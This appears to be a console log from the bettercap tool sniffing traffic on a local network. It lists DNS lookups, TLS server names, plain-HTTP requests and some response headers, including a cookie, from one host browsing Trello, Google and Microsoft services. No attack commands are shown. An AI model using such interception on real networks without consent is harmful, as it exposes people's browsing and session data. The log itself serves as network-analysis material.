192.168.1.0/24 > 192.168.1.1  » [12:58:59] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/4d6a8d86111c3f545bdeab85bae0cc8e/snowplow.js
192.168.1.0/24 > 192.168.1.1  » [12:58:59] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/trello-header-logos/1c3a2d636e34d62a6cb27d83e5e6956b/trell...
192.168.1.0/24 > 192.168.1.1  » [12:58:59] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/c13d1cd96a2cff30f0460a5e1860c5ea/header-logo-blue.svg
192.168.1.0/24 > 192.168.1.1  » [12:59:14] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.gstatic.com is 74.125.21.94
192.168.1.0/24 > 192.168.1.1  » [12:59:15] [net.sniff.https] sni 192.168.1.33 > https://www.gstatic.com
192.168.1.0/24 > 192.168.1.1  » [12:59:15] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www-google-analytics.l.google.com is 172.217.17.14
192.168.1.0/24 > 192.168.1.1  » [12:59:15] [net.sniff.https] sni 192.168.1.33 > https://www.google-analytics.com
192.168.1.0/24 > 192.168.1.1  » [12:59:38] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e10663.dscg.akamaiedge.net is 92.122.47.185
192.168.1.0/24 > 192.168.1.1  » [12:59:38] [net.sniff.http.request] http 192.168.1.33 GET cdn.content.prod.cms.msn.com/singletile/summary/alias/experiencebyname/today?market=es-ES&source=appxmani...
192.168.1.0/24 > 192.168.1.1  » [12:59:38] [net.sniff.http.response] http 92.122.47.185:80 200 OK -> 192.168.1.33 (922 B text/xml; charset=utf-8)
192.168.1.0/24 > 192.168.1.1  »  
HTTP/1.1 200 OK
Appex-Activity-Id: 4c267bcf-3b6c-4f77-8f67-bdd62db91333
X-Trace-Context: {"ActivityId":"4c267bcf-3b6c-4f77-8f67-bdd62db91333"}
Content-Length: 1158
Connection: keep-alive
X-Cms-Executiontimeinmilliseconds: 0
X-Cs-Docversions: |cms-amp-AAns84|56|
X-Powered-By: ASP.NET
Cache-Control: public, max-age=38
Date: Sun, 17 Mar 2019 11:59:39 GMT
X-Diagnostic-Dc: northeu
X-Aspnet-Version: 4.0.30319
X-Diagnostic-S: Content_IN_27
Etag: "3402622936"
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/8.5

<?xml version="1.0" encoding="utf-8"?><tile><visual addImageQuery="true" baseUri="http://img-s-msn-com.akamaized.net/tenant/amp/entityid/"><binding template="TileMedium" branding="nameAndLogo" arguments="contentID=BBUSgi4" hint-overlay="50"><image placement="peek" src="BBUSmZx.img?w=100&amp;h=100&amp;m=6&amp;tilesize=medium&amp;x=2138&amp;y=1076" /><text hint-wrap="true">Sánchez prescinde de Blanco y Valenciano en la lista para las europeas</text></binding><binding template="TileWide" branding="nameAndLogo" arguments="contentID=BBUSgi4" hint-overlay="50"><image placement="peek" src="BBUSmZx.img?w=204&amp;h=100&amp;m=6&amp;tilesize=wide&amp;x=2138&amp;y=1076" /><text hint-style="body" hint-wrap="true">Sánchez prescinde de Blanco y Valenciano en la lista para las europeas</text></binding><binding template="TileLarge" branding="nameAndLogo" arguments="contentID=BBUSgi4" hint-overlay="50"><image placement="peek

192.168.1.0/24 > 192.168.1.1  » [13:00:00] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : trello.com is 23.223.98.162
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.https] sni 192.168.1.33 > https://fonts.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : d2k1ftgv7pobq7.cloudfront.net is 54.240.186.113, 54.240.186.77, 54.240.186.178, 54.240.186.13
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www-googletagmanager.l.google.com is 216.58.201.168
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e6653.f.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e2286.e2.akamaiedge.net is 23.223.87.132
192.168.1.0/24 > 192.168.1.1  » [13:00:01] [net.sniff.https] sni 192.168.1.33 > https://www.google-analytics.com
192.168.1.0/24 > 192.168.1.1  » [13:00:02] [net.sniff.https] sni 192.168.1.33 > https://www.googletagmanager.com
192.168.1.0/24 > 192.168.1.1  » [13:00:02] [net.sniff.https] sni 192.168.1.33 > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [13:00:02] [net.sniff.https] sni 192.168.1.33 > https://a.trellocdn.com
[13:00:05] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : a-0001.a-msedge.net is 204.79.197.200, 13.107.21.200
192.168.1.0/24 > 192.168.1.1  » 192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : js.hs-scripts.com is 104.17.211.204, 104.17.210.204, 104.17.212.204, 104.17.213.204, 104.17.214.204
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : star-mini.c10r.facebook.com is 157.240.1.35
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : pagead.l.doubleclick.net is 172.217.168.162
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : d1mjjsrsnwnwry.cloudfront.net is 54.240.186.228, 54.240.186.220, 54.240.186.50, 54.240.186.85
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e15071.dscd.akamaiedge.net is 104.83.46.36
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : dart.l.doubleclick.net is 172.217.168.166
[13:00:05] [net.sniff.https] sni 192.168.1.33 > https://bat.bing.com
192.168.1.0/24 > 192.168.1.1  » 192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.https] sni 192.168.1.33 > https://js.hs-scripts.com
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.https] sni 192.168.1.33 > https://www.googleadservices.com
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.https] sni 192.168.1.33 > https://www.facebook.com
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.https] sni 192.168.1.33 > https://sjs.bizographics.com
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.https] sni 192.168.1.33 > https://c.trello.com
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.https] sni 192.168.1.33 > https://5406241.fls.doubleclick.net
192.168.1.0/24 > 192.168.1.1  » [13:00:05] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e6653.dscf.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [13:00:06] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : e6653.dscf.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [13:00:06] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : js.hs-analytics.net is 104.17.70.176, 104.17.69.176, 104.17.67.176, 104.17.68.176, 104.17.71.176
192.168.1.0/24 > 192.168.1.1  » [13:00:06] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : js.hs-analytics.net is 104.17.69.176, 104.17.68.176, 104.17.67.176, 104.17.70.176, 104.17.71.176
192.168.1.0/24 > 192.168.1.1  » [13:00:06] [net.sniff.https] sni 192.168.1.33 > https://js.hs-analytics.net
192.168.1.0/24 > 192.168.1.1  » [13:00:06] [net.sniff.https] sni 192.168.1.33 > https://googleads.g.doubleclick.net
192.168.1.0/24 > 192.168.1.1  » [13:00:06] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : pagead46.l.doubleclick.net is 172.217.16.226
192.168.1.0/24 > 192.168.1.1  » [13:00:06] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : pagead46.l.doubleclick.net is 216.58.193.162
192.168.1.0/24 > 192.168.1.1  » [13:00:07] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.google.es is 172.217.12.99
192.168.1.0/24 > 192.168.1.1  » [13:00:07] [net.sniff.https] sni 192.168.1.33 > https://adservice.google.com
[13:00:07] [net.sniff.https] sni 192.168.1.33 > https://www.google.com
192.168.1.0/24 > 192.168.1.1  » [13:00:07] [net.sniff.https] sni 192.168.1.33 > https://www.google.es
192.168.1.0/24 > 192.168.1.1  » [13:00:07] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : pagead46.l.doubleclick.net is 172.217.16.226
192.168.1.0/24 > 192.168.1.1  » [13:00:07] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : pop-eda6.mix.linkedin.com is 108.174.11.69
192.168.1.0/24 > 192.168.1.1  » [13:00:07] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : track.hubspot.com is 104.16.251.5, 104.16.252.5, 104.16.249.5, 104.16.253.5, 104.16.250.5
192.168.1.0/24 > 192.168.1.1  » [13:00:07] [net.sniff.https] sni 192.168.1.33 > https://track.hubspot.com
192.168.1.0/24 > 192.168.1.1  » [13:00:07] [net.sniff.https] sni 192.168.1.33 > https://px.ads.linkedin.com
192.168.1.0/24 > 192.168.1.1  » [13:00:23] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : gstaticadssl.l.google.com is 172.217.16.227
192.168.1.0/24 > 192.168.1.1  » [13:00:23] [net.sniff.https] sni 192.168.1.33 > https://fonts.gstatic.com
192.168.1.0/24 > 192.168.1.1  » [13:00:23] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clients.l.google.com is 216.58.211.46
192.168.1.0/24 > 192.168.1.1  » [13:00:23] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : clients.l.google.com is 64.233.177.113, 64.233.177.102, 64.233.177.100, 64.233.177.138, 64.233.177.101, 64.233.177.139
192.168.1.0/24 > 192.168.1.1  » [13:00:23] [net.sniff.https] sni 192.168.1.33 > https://clients1.google.com
192.168.1.0/24 > 192.168.1.1  » [13:00:35] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : vs.login.msa.akadns6.net is 65.55.163.90, 65.55.163.78, 65.55.163.76
192.168.1.0/24 > 192.168.1.1  » [13:00:35] [net.sniff.https] sni 192.168.1.33 > https://login.live.com
192.168.1.0/24 > 192.168.1.1  » [13:00:37] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : db5-ap.settings.data.microsoft.com.akadns.net is 40.77.226.249
192.168.1.0/24 > 192.168.1.1  » [13:00:37] [net.sniff.https] sni 192.168.1.33 > https://settings-win.data.microsoft.com
192.168.1.0/24 > 192.168.1.1  » [13:01:14] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : trello.corm is Non-Existent Domain
192.168.1.0/24 > 192.168.1.1  » [13:01:14] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : google.com is 216.58.214.174
192.168.1.0/24 > 192.168.1.1  » [13:01:14] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : google.com is 216.58.214.174
192.168.1.0/24 > 192.168.1.1  » [13:01:18] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : trello.corn is Non-Existent Domain
192.168.1.0/24 > 192.168.1.1  » [13:01:20] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : google.com is 172.217.12.110
192.168.1.0/24 > 192.168.1.1  » [13:01:20] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : google.com is 172.217.2.46
192.168.1.0/24 > 192.168.1.1  » [13:01:25] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : trello.corn is Non-Existent Domain
192.168.1.0/24 > 192.168.1.1  » [13:01:25] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : google.com is 172.217.164.78
192.168.1.0/24 > 192.168.1.1  » [13:01:25] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : google.com is 64.233.177.100, 64.233.177.139, 64.233.177.138, 64.233.177.113, 64.233.177.101, 64.233.177.102
192.168.1.0/24 > 192.168.1.1  » [13:01:32] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : star-mini.c10r.facebook.com is 157.240.1.35
192.168.1.0/24 > 192.168.1.1  » [13:01:32] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : vpcproduction-vpcpingservergo-1064098993.us-east-1.elb.amazonaws.com is 184.73.79.178, 52.202.60.97, 34.198.102.25, 54.209.13.190
192.168.1.0/24 > 192.168.1.1  » [13:01:32] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : vpcproduction-vpcpingservergo-1064098993.us-east-1.elb.amazonaws.com is 184.73.79.178, 52.202.60.97, 34.198.102.25, 54.209.13.190
192.168.1.0/24 > 192.168.1.1  » [13:01:33] [net.sniff.https] sni 192.168.1.33 > https://www.facebook.com
192.168.1.0/24 > 192.168.1.1  » [13:01:33] [net.sniff.https] sni 192.168.1.33 > https://performance.typekit.net
192.168.1.0/24 > 192.168.1.1  » [13:01:34] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : safebrowsing.googleapis.com is 172.217.168.170
192.168.1.0/24 > 192.168.1.1  » [13:01:34] [net.sniff.https] sni 192.168.1.33 > https://safebrowsing.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [13:01:34] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : safebrowsing.googleapis.com is 172.217.16.234
192.168.1.0/24 > 192.168.1.1  » [13:01:56] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : b-0005.b-msedge.net is 13.107.6.158
192.168.1.0/24 > 192.168.1.1  » [13:01:56] [net.sniff.https] sni 192.168.1.33 > https://www.bing.com
192.168.1.0/24 > 192.168.1.1  » [13:01:56] [net.sniff.https] sni 192.168.1.33 > https://api.cortana.ai
192.168.1.0/24 > 192.168.1.1  » [13:01:56] [net.sniff.https] sni 192.168.1.33 > https://api.cortana.ai
192.168.1.0/24 > 192.168.1.1  » [13:01:56] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : ocsp.globalsign.cloud is 104.18.25.243, 104.18.24.243
192.168.1.0/24 > 192.168.1.1  » [13:01:56] [net.sniff.http.request] http 192.168.1.33 GET ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQirwAcgHViBybgyJMa7KdCHDISOgQUenuMwc%2FnoMoc1G...
192.168.1.0/24 > 192.168.1.1  » [13:01:56] [net.sniff.http.response] http 104.18.25.243:80 200 OK -> 192.168.1.33 (863 B application/ocsp-response)

HTTP/1.1 200 OK
Set-Cookie: __cfduid=d2eec40025f669a31f479ec289fe146641552824117; expires=Mon, 16-Mar-20 12:01:57 GMT; path=/; domain=.msocsp.com; HttpOnly
Expires: Thu, 21 Mar 2019 08:38:11 GMT
Last-Modified: Sun, 17 Mar 2019 08:38:11 GMT
Connection: keep-alive
Server: cloudflare
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
Date: Sun, 17 Mar 2019 12:01:57 GMT
X-Cache: HIT
Cf-Cache-Status: HIT
Cf-Ray: 4b8ed0b03954c66d-MAD
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Content-Length: 1831
Etag: "d59aad436c8bd1dc23d49d224603d5c985def07f"

192.168.1.0/24 > 192.168.1.1  » [13:01:57] [net.sniff.https] sni 192.168.1.33 > https://fp.msedge.net
192.168.1.0/24 > 192.168.1.1  » [13:01:59] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : block-edge-anycast.dropbox.com is 162.125.248.4
192.168.1.0/24 > 192.168.1.1  » [13:01:59] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : a1879.dscw14.akamai.net is 92.122.241.162, 92.122.241.130
192.168.1.0/24 > 192.168.1.1  » [13:01:59] [net.sniff.https] sni 192.168.1.33 > https://fp-as.azureedge.net
192.168.1.0/24 > 192.168.1.1  » [13:02:00] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : a-9999.dc-msedge.net is 131.253.33.254
192.168.1.0/24 > 192.168.1.1  » [13:02:00] [net.sniff.https] sni 192.168.1.33 > https://a-ring-fallback.msedge.net
192.168.1.0/24 > 192.168.1.1  » [13:02:00] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : dw8wjz3q0i4gj.cloudfront.net is 54.192.61.92, 54.192.61.165, 54.192.61.205, 54.192.61.230
192.168.1.0/24 > 192.168.1.1  » [13:02:00] [net.sniff.https] sni 192.168.1.33 > https://dw8wjz3q0i4gj.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:02:00] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e8218.dscb1.akamaiedge.net is 23.51.235.27
192.168.1.0/24 > 192.168.1.1  » [13:02:00] [net.sniff.http.request] http 192.168.1.33 GET s.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7Lvw...
192.168.1.0/24 > 192.168.1.1  » [13:02:05] [net.sniff.https] sni 192.168.1.33 > https://dw8wjz3q0i4gj.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:02:06] [net.sniff.http.response] http 23.51.235.27:80 200 OK -> 192.168.1.33 (1.1 kB application/ocsp-response)
192.168.1.0/24 > 192.168.1.1  » [13:02:11] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : cs9.wac.phicdn.net is 93.184.220.29
192.168.1.0/24 > 192.168.1.1  » [13:02:11] [net.sniff.http.request] http 192.168.1.33 GET ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu...
192.168.1.0/24 > 192.168.1.1  » [13:02:11] [net.sniff.http.response] http 93.184.220.29:80 200 OK -> 192.168.1.33 (471 B application/ocsp-response)
192.168.1.0/24 > 192.168.1.1  » [13:03:04] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.google.com is 172.217.10.196
192.168.1.0/24 > 192.168.1.1  » [13:03:04] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : www.google.com is 64.233.176.147, 64.233.176.99, 64.233.176.103, 64.233.176.106, 64.233.176.104, 64.233.176.105
192.168.1.0/24 > 192.168.1.1  » [13:03:13] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : translate.googleapis.com is 216.58.201.170
192.168.1.0/24 > 192.168.1.1  » [13:03:13] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : translate.googleapis.com is 216.58.201.170
192.168.1.0/24 > 192.168.1.1  » [13:03:14] [net.sniff.https] sni 192.168.1.33 > https://translate.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [13:03:42] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clients.l.google.com is 64.233.177.113, 64.233.177.102, 64.233.177.100, 64.233.177.138, 64.233.177.101, 64.233.177.139
192.168.1.0/24 > 192.168.1.1  » [13:03:43] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : history.l.google.com is 74.125.140.113, 74.125.140.139, 74.125.140.138, 74.125.140.101, 74.125.140.102, 74.125.140.100
192.168.1.0/24 > 192.168.1.1  » [13:03:43] [net.sniff.https] sni 192.168.1.33 > https://history.google.com
192.168.1.0/24 > 192.168.1.1  » [13:03:43] [net.sniff.https] sni 192.168.1.33 > https://history.google.com
192.168.1.0/24 > 192.168.1.1  » [13:04:08] [net.sniff.https] sni 192.168.1.33 > https://clients4.google.com
192.168.1.0/24 > 192.168.1.1  » [13:04:14] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : update.googleapis.com is 172.217.17.3
192.168.1.0/24 > 192.168.1.1  » [13:04:14] [net.sniff.https] sni 192.168.1.33 > https://update.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [13:04:16] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.google.com is 74.125.21.104, 74.125.21.103, 74.125.21.147, 74.125.21.105, 74.125.21.99, 74.125.21.106
192.168.1.0/24 > 192.168.1.1  » [13:04:16] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : trello.xn--co-5ia is Non-Existent Domain
192.168.1.0/24 > 192.168.1.1  » [13:04:16] [net.sniff.https] sni 192.168.1.33 > https://www.google.com
192.168.1.0/24 > 192.168.1.1  » [13:04:16] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : ssl.gstatic.com is 64.233.176.94
192.168.1.0/24 > 192.168.1.1  » [13:04:17] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.gstatic.com is 74.125.21.94
192.168.1.0/24 > 192.168.1.1  » [13:04:17] [net.sniff.https] sni 192.168.1.33 > https://ssl.gstatic.com
192.168.1.0/24 > 192.168.1.1  » [13:04:17] [net.sniff.https] sni 192.168.1.33 > https://www.gstatic.com
192.168.1.0/24 > 192.168.1.1  » [13:04:17] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : consent.google.com is 64.233.184.113, 64.233.184.100, 64.233.184.102, 64.233.184.101, 64.233.184.138, 64.233.184.139
192.168.1.0/24 > 192.168.1.1  » [13:04:17] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : consent.google.com is 172.217.16.238
192.168.1.0/24 > 192.168.1.1  » [13:04:17] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : redirector.gvt1.com is 74.125.21.101, 74.125.21.113, 74.125.21.138, 74.125.21.102, 74.125.21.139, 74.125.21.100
192.168.1.0/24 > 192.168.1.1  » [13:04:17] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : redirector.gvt1.com is 216.58.201.142
192.168.1.0/24 > 192.168.1.1  » [13:04:17] [net.sniff.https] sni 192.168.1.33 > https://consent.google.com
192.168.1.0/24 > 192.168.1.1  » [13:04:18] [net.sniff.http.request] http 192.168.1.33 HEAD redirector.gvt1.com/edgedl/release2/chrome_component/ANDYbWO0cLH-_5035/5035_all_crl-set-66108064...

HEAD /edgedl/release2/chrome_component/ANDYbWO0cLH-_5035/5035_all_crl-set-6610806470112978802.data.crx3 HTTP/1.1
Host: redirector.gvt1.com
User-Agent: Microsoft BITS/7.8
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity



192.168.1.0/24 > 192.168.1.1  » [13:04:18] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : plus.l.google.com is 216.58.211.46
192.168.1.0/24 > 192.168.1.1  » [13:04:18] [net.sniff.https] sni 192.168.1.33 > https://apis.google.com
192.168.1.0/24 > 192.168.1.1  » [13:04:19] [net.sniff.https] sni 192.168.1.33 > https://clients1.google.com
192.168.1.0/24 > 192.168.1.1  » [13:04:19] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.google.es is 216.58.201.163
192.168.1.0/24 > 192.168.1.1  » [13:04:19] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : www.google.es is 172.217.12.99
192.168.1.0/24 > 192.168.1.1  » [13:04:19] [net.sniff.https] sni 192.168.1.33 > https://www.google.es
192.168.1.0/24 > 192.168.1.1  » [13:04:19] [net.sniff.https] sni 192.168.1.33 > https://adservice.google.com
192.168.1.0/24 > 192.168.1.1  » [13:04:19] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : trello.com is 184.27.2.122
192.168.1.0/24 > 192.168.1.1  » [13:04:19] [net.sniff.http.request] http 192.168.1.33 GET trello.com/
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googleadapis.l.google.com is 172.217.16.234
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : d2k1ftgv7pobq7.cloudfront.net is 54.240.186.178, 54.240.186.13, 54.240.186.113, 54.240.186.77
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.http.request] http 192.168.1.33 GET fonts.googleapis.com/css?family=Roboto
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/08e7d2cd3b12804c1b7214d828bab7e6/cookiec.min.js
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/4d6a8d86111c3f545bdeab85bae0cc8e/snowplow.js
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/trello-header-logos/1c3a2d636e34d62a6cb27d83e5e6956b/trell...
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.http.request] http 192.168.1.33 GET d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/c13d1cd96a2cff30f0460a5e1860c5ea/header-logo-blue.svg
192.168.1.0/24 > 192.168.1.1  » [13:04:20] [net.sniff.http.response] http 172.217.16.234:80 200 OK -> 192.168.1.33 (841 B text/css; charset=utf-8)
192.168.1.0/24 > 192.168.1.1  » [13:04:29] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:04:29] [net.sniff.https] sni 192.168.1.33 > https://fonts.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [13:04:29] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:04:29] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:04:29] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:04:29] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:04:29] [net.sniff.https] sni 192.168.1.33 > https://d2k1ftgv7pobq7.cloudfront.net
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www-google-analytics.l.google.com is 172.217.17.14
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e6653.f.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : e2286.e2.akamaiedge.net is 23.214.73.99
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : www-google-analytics.l.google.com is 64.233.177.101, 64.233.177.139, 64.233.177.138, 64.233.177.100, 64.233.177.102, 64.233.177.113
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : e6653.f.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : e2286.e2.akamaiedge.net is 23.214.73.99
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.https] sni 192.168.1.33 > https://www.googletagmanager.com
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.https] sni 192.168.1.33 > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.https] sni 192.168.1.33 > https://www.google-analytics.com
192.168.1.0/24 > 192.168.1.1  » [13:04:30] [net.sniff.https] sni 192.168.1.33 > https://a.trellocdn.com
192.168.1.0/24 > 192.168.1.1  » [13:04:33] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : star-mini.c10r.facebook.com is 157.240.1.35
